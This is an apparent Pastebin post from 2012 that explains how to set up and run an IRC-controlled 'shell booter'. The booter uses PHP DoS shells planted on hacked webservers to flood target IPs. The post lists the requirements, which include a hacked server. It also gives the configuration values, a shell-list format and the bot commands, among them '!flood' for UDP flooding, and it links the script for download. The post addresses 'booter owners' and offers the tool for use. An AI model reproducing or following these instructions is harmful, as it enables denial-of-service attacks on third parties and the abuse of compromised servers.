Advertisement
HackerRIZLA

Making an IRC based shell booter.

Sep 16th, 2012
782
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
  1. I am sharing it here as I know their are many booter owners so I know some people will find this useful.
  2. Requirements:
  3. (Hacked) Webserver/Server with php engine
  4. PHP functions which are not blocked:
  5. fsocketopen();
  6. file_get_contents();
  7. set_time_limit(0);
  8. Access to an IRC Server/channel (can be a public one)
  9. PHP DoS Shells
  10. My php script
  11.  
  12. How to set it up:
  13. 1. Copy the script (at the end of this thread) and put it into an editor.
  14. 2. Configure the following things in your editor to your IRC Server:
  15. PHP Code:
  16. //Config
  17.  
  18. $IRC_SERVER = "irc.server.com";
  19. $IRC_PORT = "6667";
  20. $IRC_NICK = "[BOOTER]";
  21. $IRC_CHANNEL = "#channel";
  22. $IRC_MASTERPASS = "password";
  23. 3. Save the file as shellbooter.php (can be named to anything you want)
  24. 4. Upload the file to your server
  25. 5. Run the script by visiting the website in your browser ( http://exampleserver.com/shellbooter.php ) -> The booter will join your IRC Server/Channel
  26. 6. Check your channel on your IRC Server for the booter.
  27.  
  28. Setting up your list of shells:
  29. Put all your shells into a .txt file like this:
  30. Code:
  31. http://server1.com/shell.php
  32. http://server2.net/x32.php
  33. http://www.server3.info/somefolder/maybe/shell.php
  34. and upload it somewhere, where you can directly access it.
  35. For example with dropbox.
  36.  
  37. How to control it:
  38. You can control the booter with the following commands:
  39. Code:
  40. !join <channel> -> Join Channel
  41. !part <channel> -> Leave Channel
  42. !kill <Masterpass> -> Kills the bot
  43. !getlist <URL> -> Gets the list of shells
  44. !flood <IP> <Port> <Time (sec)> -> Flood
  45.  
  46. First you need to let your booter know about your shells. You do that like this:
  47. Code:
  48. !getlist http://someserver/directlike/to/shells.txt
  49. The booter will reply with:
  50. Code:
  51. [SHELLS] - Amount of shells: XX
  52.  
  53. Then you can let it boot. You do that like this (example):
  54. Code:
  55. !flood 123.123.123.123 80 20
  56. The booter will reply with:
  57. Code:
  58. [UDP Flood] - Host: 123.123.123.123 | Port: 80 | Time: 20 | Sending to shells...
  59.  
  60. That's all. Your IRC Booter will send the request to your shells.
  61. Feel free to mod the script or whatever you want to do with it:)
  62.  
  63. PHP Script: http://www.mediafire.com/?o1q3hcrfobvutp0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement